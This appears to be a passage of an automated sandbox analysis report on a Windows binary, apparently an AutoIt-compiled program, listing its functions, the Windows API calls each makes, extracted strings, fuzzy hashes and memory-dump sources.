Instruction Fuzzy Hash: E1112B31788346BED7149A24EC82CEB7BDCDF2D364B10102AF900B6281DB715F8456B1

Uniqueness

Uniqueness Score: -1.00%

Function 00E142F8, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E14312
LoadStringW.USER32(00000000), ref: 00E14319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E1432F
LoadStringW.USER32(00000000), ref: 00E14336
_wprintf.LIBCMT ref: 00E1435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E1437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00E14357

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 67ef65036662c7ce6658b0782e08b071ce03d9dc796080a9c532d871f8733167
Instruction ID: 03ca3dc8694a1360c2d2469906cedfd649b0c0074ef84bf9939cd83ea28a991b
Opcode Fuzzy Hash: 67ef65036662c7ce6658b0782e08b071ce03d9dc796080a9c532d871f8733167
Instruction Fuzzy Hash: 93014FF290020CBFE71197A5DE8DEEA7B6CDB08301F0005A1F749F2151EA749E894B71

Uniqueness

Uniqueness Score: -1.00%

Function 00E3D43E, Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DB2612: GetWindowLongW.USER32(?,000000EB), ref: 00DB2623

GetSystemMetrics.USER32 ref: 00E3D47C
GetSystemMetrics.USER32 ref: 00E3D49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00E3D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00E3D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00E3D716
ShowWindow.USER32(00000003,00000000), ref: 00E3D735
InvalidateRect.USER32(?,00000000,00000001), ref: 00E3D75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 00E3D77D

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: e715d61a6be0810b8338b893e1e2ed7d2b2f4c0c06c122434670e8a8bb7d825c
Instruction ID: 77866ad6f98fc9e759ec33c8fc1325717a6371f0b1cc0b1bdfed85822eaefd19
Opcode Fuzzy Hash: e715d61a6be0810b8338b893e1e2ed7d2b2f4c0c06c122434670e8a8bb7d825c
Instruction Fuzzy Hash: 91B1CB71A04219EFDF14CF29D9897BD7BB1FF04705F08906AEC58AB295D730A954CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00DB2A5B, Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00DEC1C7,00000004,00000000,00000000,00000000), ref: 00DB2ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00DEC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00DB2B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00DEC1C7,00000004,00000000,00000000,00000000), ref: 00DEC21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00DEC1C7,00000004,00000000,00000000,00000000), ref: 00DEC286

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 5716d3fe8e64c845c152222262bdfe9017ffab0246e48e68854291ef0b8068f9
Instruction ID: 8f271f17e2e03cda98881b48a1ab414f8b6b6726b3d0cc41e454c8c43628a19a
Opcode Fuzzy Hash: 5716d3fe8e64c845c152222262bdfe9017ffab0246e48e68854291ef0b8068f9
Instruction Fuzzy Hash: C741F7336146C0DFC739AB2A8C8DBFA7B91AB85310F6C981DE187925A1C674E846D731

Uniqueness

Uniqueness Score: -1.00%

Function 00E361D3, Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00E361EB
GetDC.USER32(00000000), ref: 00E361F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E361FE
ReleaseDC.USER32 ref: 00E3620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00E36246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E36257
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E36291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E362B1

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 4ad6ac22d01a8b5969d94448ddb01cc18f2fbdbb1fc22fd4aa5fbfe063ef9113
Instruction ID: bf0634468d14293ff9757837dc3fac3d5fc7b4c05125ef667001359bd8cc5b34
Opcode Fuzzy Hash: 4ad6ac22d01a8b5969d94448ddb01cc18f2fbdbb1fc22fd4aa5fbfe063ef9113
Instruction Fuzzy Hash: C7316F721012147FEB114F65CC8AFEB3FA9EF49755F054065FE08AA2A1C6759C41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00DB1424, Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 127db6a1670bf4b1d4f3547e0361f74ef1fbe701f0ccb24b09c87bd500087e42
Instruction ID: c84d4597a0a0057c9cc7aa4adb00b3bf3ef2a6fdb7ba8e3f555c9619eaf320fd
Opcode Fuzzy Hash: 127db6a1670bf4b1d4f3547e0361f74ef1fbe701f0ccb24b09c87bd500087e42
Instruction Fuzzy Hash: DF716A34900109EFCB149F99CC99AFFBBB9FF85320F548159F916AA251C730AA51CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00E3B351, Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01569100), ref: 00E3B3EB
IsWindowEnabled.USER32(01569100), ref: 00E3B3F7
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00E3B4DB
SendMessageW.USER32(01569100,000000B0,?,?), ref: 00E3B512
IsDlgButtonChecked.USER32(?,?), ref: 00E3B54F
GetWindowLongW.USER32(01569100,000000EC), ref: 00E3B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00E3B589

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 509e88db3aa844737882a1881f4d6687537753d2d3dcd4871194b0408aabf3e2
Instruction ID: f995dc7b02cfda3273334c9ce1569207718f77521fc2aa64b2b44832352241ee
Opcode Fuzzy Hash: 509e88db3aa844737882a1881f4d6687537753d2d3dcd4871194b0408aabf3e2
Instruction Fuzzy Hash: 8971D034600204EFDB24CF55C899FBABFB9EF49304F146069EA56B72A2D771A940CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00E0F65E, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00E0F671
__wcsnicmp.LIBCMT ref: 00E0F692
__wcsnicmp.LIBCMT ref: 00E0F6AC

Strings

#requireadmin, xrefs: 00E0F68C
#OnAutoItStartRegister, xrefs: 00E0F6A6
#notrayicon, xrefs: 00E0F669

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: d0ff5db1debc6fdcbf6791f4cf42ea84d37e4b389b95c38db034b143d3f21feb
Instruction ID: d824f8c9dcc8909854f1a70cfe3d9230327e1588b4206cbab18312f864c5e799
Opcode Fuzzy Hash: d0ff5db1debc6fdcbf6791f4cf42ea84d37e4b389b95c38db034b143d3f21feb
Instruction Fuzzy Hash: BE217972214611B6C230AA34BC02FF77398EF55304F14503BF942A65D1EB919DE2C2F6

Uniqueness

Uniqueness Score: -1.00%

Function 00E3B635, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E3B644
_memset.LIBCMT ref: 00E3B653
CreateProcessW.KERNEL32 ref: 00E3B682
CloseHandle.KERNEL32 ref: 00E3B694

Strings

do, xrefs: 00E3B64D
o, xrefs: 00E3B63E

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: o$do
API String ID: 3277943733-2180341428
Opcode ID: 9fa780c539f76905b99938df8dd58a865bdca8e0fd59c4acb9e61841c2f4fb99
Instruction ID: fbb92aaf74c446a965f1992d548c71caa400c359aa48e2ca9ec4ad79cd41a09b
Opcode Fuzzy Hash: 9fa780c539f76905b99938df8dd58a865bdca8e0fd59c4acb9e61841c2f4fb99
Instruction Fuzzy Hash: 94F054B16407047EE2106F627C0AF7B3E5CEB04359F004021FA0CF6192D7754C0487B8

Uniqueness

Uniqueness Score: -1.00%

Function 00DB1DB3, Relevance: 9.3, APIs: 6, Instructions: 254COMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 00DB1DDC
GetWindowRect.USER32 ref: 00DB1E1D
ScreenToClient.USER32 ref: 00DB1E45
GetClientRect.USER32 ref: 00DB1F74
GetWindowRect.USER32 ref: 00DB1F8D

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 7e9c13d208bf68e1955112aa8c6a917399fd06ee7c8cd6261470686691ab7cc7
Instruction ID: addb7285a7a31c42dee1f020e854e87fd1cf518ff498dd418f76bad566f038dc
Opcode Fuzzy Hash: 7e9c13d208bf68e1955112aa8c6a917399fd06ee7c8cd6261470686691ab7cc7
Instruction Fuzzy Hash: 2CB15E7990024ADBDF10CF69C5947EEB7B1FF08310F54916AEC9A9B254DB30E950CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00E164B8, Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E1660B
_memmove.LIBCMT ref: 00E16546

Part of subcall function 00DB9837: __itow.LIBCMT ref: 00DB9862
Part of subcall function 00DB9837: __swprintf.LIBCMT ref: 00DB98AC

Part of subcall function 00DD0DB6: _malloc.LIBCMT ref: 00DD0DCE

_memmove.LIBCMT ref: 00E165B9
_memmove.LIBCMT ref: 00E166A0
_memmove.LIBCMT ref: 00E166B9
_memmove.LIBCMT ref: 00E166D5

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _memmove$__itow__swprintf_malloc
String ID:
API String ID: 83262069-0
Opcode ID: a9ab0f4bda76727cd03d693a561b1113fc175b014468d38349deadbb732fb169
Instruction ID: cd6ec9ebe62cc9c7b5757297dd9efa58b1441fb61efd301e19ec51a5feb76d5a
Opcode Fuzzy Hash: a9ab0f4bda76727cd03d693a561b1113fc175b014468d38349deadbb732fb169
Instruction Fuzzy Hash: 81618C3150429A9BCF01EF60CC92EFE7BA9EF45308F044559F9566B292DB34E945CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00E1220A, Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E12258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E122A3
IsMenu.USER32 ref: 00E122C3
CreatePopupMenu.USER32(00E75890,00000040,745E33D0), ref: 00E122F7
GetMenuItemCount.USER32 ref: 00E12355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00E12386

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 035ad38f139e32063f4e32b96a224780d55aea15a6fb6a9d3d7fcd9dae165498
Instruction ID: 3439b5f6eb09d0f69b2cc45bd113458200acc4f03d84abf93b21fb6949d6134b
Opcode Fuzzy Hash: 035ad38f139e32063f4e32b96a224780d55aea15a6fb6a9d3d7fcd9dae165498
Instruction Fuzzy Hash: 9C517C70A0024AEFDF21CF64DC88BEDBBE5AF45318F10512DEA61B7290D37499A5CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00DB1765, Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00DB2612: GetWindowLongW.USER32(?,000000EB), ref: 00DB2623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00DB179A
GetWindowRect.USER32 ref: 00DB17FE
ScreenToClient.USER32 ref: 00DB181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00DB182C
EndPaint.USER32(?,?), ref: 00DB1876

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 65836dd6a415731930dccb9dbc1b92b6a61247e13ab4043977b4d7e491003d6f
Instruction ID: 9295df311c0ec2e61eaa877c2b4f3d1559422d0064887a9c3c31ff78516ff4d0
Opcode Fuzzy Hash: 65836dd6a415731930dccb9dbc1b92b6a61247e13ab4043977b4d7e491003d6f
Instruction Fuzzy Hash: 2241BF35500600EFD710DF26DC99FAA7BE8FB45320F180629F5A9972A1C7709849DB72

Uniqueness

Uniqueness Score: -1.00%

Function 00E3B69E, Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00E757B0,00000000,01569100,?,?,00E757B0,?,00E3B5A8,?,?), ref: 00E3B712
EnableWindow.USER32(?,00000000), ref: 00E3B736
ShowWindow.USER32(00E757B0,00000000,01569100,?,?,00E757B0,?,00E3B5A8,?,?), ref: 00E3B796
ShowWindow.USER32(?,00000004,?,00E3B5A8,?,?), ref: 00E3B7A8
EnableWindow.USER32(?,00000001), ref: 00E3B7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00E3B7EF

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: e049fbdee6e2342fc72db1b558f941579b71d299d08b0ad69fc98714d93f7561
Instruction ID: 1633d8808aa257ef3bc5f86393ffb9d44abe35c79153bbc137111ce660bb03d8
Opcode Fuzzy Hash: e049fbdee6e2342fc72db1b558f941579b71d299d08b0ad69fc98714d93f7561
Instruction Fuzzy Hash: DA418534600144AFDB21CF24C49DB947FE1FF45314F1852BAFA4AAF6A2C731A856CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E3BEAA, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00DB12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DB134D
Part of subcall function 00DB12F3: SelectObject.GDI32(?,00000000), ref: 00DB135C
Part of subcall function 00DB12F3: BeginPath.GDI32(?), ref: 00DB1373
Part of subcall function 00DB12F3: SelectObject.GDI32(?,00000000), ref: 00DB139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00E3BED4
LineTo.GDI32(00000000,00000003,?), ref: 00E3BEE8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E3BEF6
LineTo.GDI32(00000000,00000000,?), ref: 00E3BF06
EndPath.GDI32(00000000), ref: 00E3BF16
StrokePath.GDI32(00000000), ref: 00E3BF26

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 9cd714ef1e65d47accdaadcc833e383dbf890c5d6074327ac48f35f85c922079
Instruction ID: cdbf03c31dd963e294b7147fefd49059347e31b798cb11cfa48f3cae9053c953
Opcode Fuzzy Hash: 9cd714ef1e65d47accdaadcc833e383dbf890c5d6074327ac48f35f85c922079
Instruction Fuzzy Hash: E011097640010DBFEB019F95EC88EEA7FADEB08354F048061FA196A161C7719E99DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00DD0162, Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DD0193
MapVirtualKeyW.USER32(00000010,00000000), ref: 00DD019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DD01A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DD01B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00DD01B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00DD01C1

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: e2ba3c1c738273a2ae320eeb8133a05d1570f3891a1d45ebb43391bde5746c0c
Instruction ID: a95930b73676a4e027b5d35dbcd59c12110def406f3078c5855b024847991a64
Opcode Fuzzy Hash: e2ba3c1c738273a2ae320eeb8133a05d1570f3891a1d45ebb43391bde5746c0c
Instruction Fuzzy Hash: 4A0148B09017597DE3008F5A8C85A52FEA8FF19354F00411BE15847941C7B5A868CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00E17230, Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00E17243
EnterCriticalSection.KERNEL32(?,?,00DC0EE4,?,?), ref: 00E17254
TerminateThread.KERNEL32(00000000,000001F6,?,00DC0EE4,?,?), ref: 00E17261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00DC0EE4,?,?), ref: 00E1726E

Part of subcall function 00E16C35: CloseHandle.KERNEL32(00000000,?,00E1727B,?,00DC0EE4,?,?), ref: 00E16C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 00E17281
LeaveCriticalSection.KERNEL32(?,?,00DC0EE4,?,?), ref: 00E17288

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 8b3dea7b9fb05bcb9262b939806317482d5bdeddb3ca9c762e463ced9ecf650e
Instruction ID: 94de481911f804002885b0e83792f85a1d906f7ff53648ec335b7c451392ec3a
Opcode Fuzzy Hash: 8b3dea7b9fb05bcb9262b939806317482d5bdeddb3ca9c762e463ced9ecf650e
Instruction Fuzzy Hash: 47F0BE36840206EFD7111B64ED4CDDB7B79EF08702B010131F643B00B1CBB65889CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E12753, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E127C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E127DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00E12822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E75890,00000000), ref: 00E1286B

Strings

0, xrefs: 00E127B5

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 6dbf3b5261051543591ad23d0da385039a2e664fa0b228ff8a74184665f712e5
Instruction ID: 15de15b484ec7d7ca5547e547221224259bf424483c62539a17dd97b67e39706
Opcode Fuzzy Hash: 6dbf3b5261051543591ad23d0da385039a2e664fa0b228ff8a74184665f712e5
Instruction Fuzzy Hash: 6041B1716043419FDB28DF24CC44B9ABBE4EF85314F04492DFAA6A72D1D730E855CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00DB407C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00DED3D7

Part of subcall function 00DB7BCC: _memmove.LIBCMT ref: 00DB7C06

_memset.LIBCMT ref: 00DB40FC
_wcscpy.LIBCMT ref: 00DB4150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DB4160

Strings

Line: , xrefs: 00DED400

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: ad841969b31583f8fdcd21aec31f9e73383599adb02e720ee11f8a3bf40b2f08
